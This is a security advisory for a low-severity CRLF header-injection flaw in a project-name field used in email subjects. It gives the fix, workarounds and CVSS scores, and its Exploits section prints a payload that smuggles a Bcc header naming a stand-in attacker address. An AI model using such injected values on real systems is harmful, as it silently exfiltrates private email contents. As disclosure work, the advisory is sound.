GSSA-2026-05-442ENFGITLAB-GSSA-2026-05-442ENFMay 7, 20262.0 Low
CRLF injection in email subject via project name
Project name was interpolated into outbound email subjects without rejecting CR/LF, so an admin could inject extra headers (Bcc, etc.) via the project settings form. Fixed by rejecting line breaks in the project name validator.
Affected (1)
- gelhaus-solutionscontributer-checker
- ≥ 0.0.0Fixed in 0.0.1
Mitigations
Workarounds
- Manually rename any project whose name contains a CR (\r) or LF (\n) character before the next outbound email is sent.
- Configure the SMTP transport to reject messages with multi-line subject headers.
Solutions
- Upgrade to 0.0.1: `settingsSchema.name` adds a `.refine(v => !/[\r\n]/.test(v))` so CR/LF in the project name is rejected at form submit and never written to the database.
Exploits
- 1. As a project ADMIN, edit project settings. 2. Set name to `My Project\r\nBcc: attacker@example.com`. 3. Save. 4. The next decision/notification email carries the injected `Bcc:` header — every notification for that project is silently BCCd to the attacker.
Configurations
- Any deployment with SMTP configured (env `SMTP_HOST` and `SMTP_FROM` set) where transactional notification emails are enabled.
- Particularly impactful on SMTP transports/older nodemailer versions that do not strip CRLF in headers.
Overview
Project name allowed CR/LF and was used in email subject lines, enabling header injection.
Severity
CVSS v4
2.0 Low
2.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N- Attack vector
- Network
- Attack complexity
- Low
- Attack requirements
- None
- Privileges required
- High
- User interaction
- None
- Confidentiality (vulnerable system)
- Low
- Integrity (vulnerable system)
- Low
- Availability (vulnerable system)
- None
- Confidentiality (subsequent system)
- None
- Integrity (subsequent system)
- None
- Availability (subsequent system)
- None
CVSS v3
3.8 Low
3.8
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N- Attack vector
- Network
- Attack complexity
- Low
- Privileges required
- High
- User interaction
- None
- Scope
- Unchanged
- Confidentiality
- Low
- Integrity
- Low
- Availability
- None
Weaknesses (1)
References (3)
- CWE-93: Improper Neutralization of CRLF Sequences (Technical description)
- OWASP — CRLF Injection (Technical description)
- RFC 5322 — Internet Message Format, Header fields (Technical description)
Credits (2)
- Enno GelhausRemediation developer · egelhaus@ennogelhaus.de
- Enno GelhausFinder · egelhaus@ennogelhaus.de
Context
Impacts
Header injection in transactional emails (Bcc/Cc/Reply-To/MIME headers) — silent data exfiltration of applicant identities and decision details.
CAPEC-105